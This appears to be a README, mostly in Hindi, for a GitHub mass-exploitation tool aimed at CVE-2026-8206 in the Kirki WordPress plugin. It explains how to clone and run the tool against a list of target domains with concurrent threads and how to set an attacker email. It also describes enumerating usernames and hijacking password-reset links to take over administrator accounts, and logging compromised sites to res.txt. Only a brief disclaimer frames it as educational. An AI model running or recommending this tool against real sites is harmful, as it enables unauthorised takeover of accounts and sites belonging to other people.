
Mass exploitation tool for CVE-2026-8206 – Unauthenticated Privilege Escalation via 'handle_forgot_password' in Kirki WordPress plugin (≤6.0.6).
CVE-2026-8206 के लिए मास एक्सप्लॉइटेशन टूल – Kirki WordPress प्लगइन (संस्करण ≤ 6.0.6) में एक गंभीर कमजोरी जो अप्रमाणित हमलावरों को पासवर्ड रीसेट लिंक को हाईजैक करने और किसी भी उपयोगकर्ता खाते, जिसमें प्रशासक भी शामिल हैं, पर पूर्ण नियंत्रण प्राप्त करने की अनुमति देती है।
Kirki प्लगइन एक अप्रमाणित REST एंडपॉइंट (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password) को उजागर करता है। अनुमति जाँच और अनुचित ईमेल सत्यापन की कमी के कारण, एक हमलावर:
प्रभावित संस्करण: ≤ 6.0.6
स्थिर संस्करण: 6.0.7
readme.txt और kirki.min.css की जाँच करता है (kirki और kirki-test दोनों फ़ोल्डरों का समर्थन करता है)/wp-json/wp/v2/users से वास्तविक उपयोगकर्ता नाम प्राप्त करता है (admin पर वापस गिरता है)requests लाइब्रेरीconcurrent.futures (बैकपोर्ट, आमतौर पर स्थापित)निर्भरताएँ स्थापित करें:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
अपना हमलावर ईमेल सेट करने के लिए स्क्रिप्ट को संपादित करें:
ATTACKER_EMAIL = "[email protected]" # पंक्ति ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – एक टेक्स्ट फ़ाइल जिसमें प्रति पंक्ति एक डोमेन हो (http:///https:// के साथ या बिना)[threads] – वैकल्पिक, समवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – सफलतापूर्वक शोषित लक्ष्यों को इस प्रारूप में शामिल करता है:
URL|username|attacker_email|reset_link_sent_to_attacker_email
उदाहरण:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
कंसोल आउटपुट रीयल-टाइम प्रगति दिखाता है:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) और /.../kirki.min.css (ver पैरामीटर) का अनुरोध करता है। यदि संस्करण ≤ 6.0.6 है, तो आगे बढ़ें।/wp-json/wp/v2/users का प्रयास करता है, यदि खाली है तो admin पर वापस गिरता है।username = लक्ष्य उपयोगकर्ता नामemail = हमलावर का ईमेलemailBody = JSON जिसमें reset_link चिप शामिल है200 और "Email sent" के साथ प्रतिक्रिया देता है, तो लक्ष्य res.txt में लिखा जाता है।यह सॉफ्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
अधिक अस्वीकरण आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! जाँच सकते हैं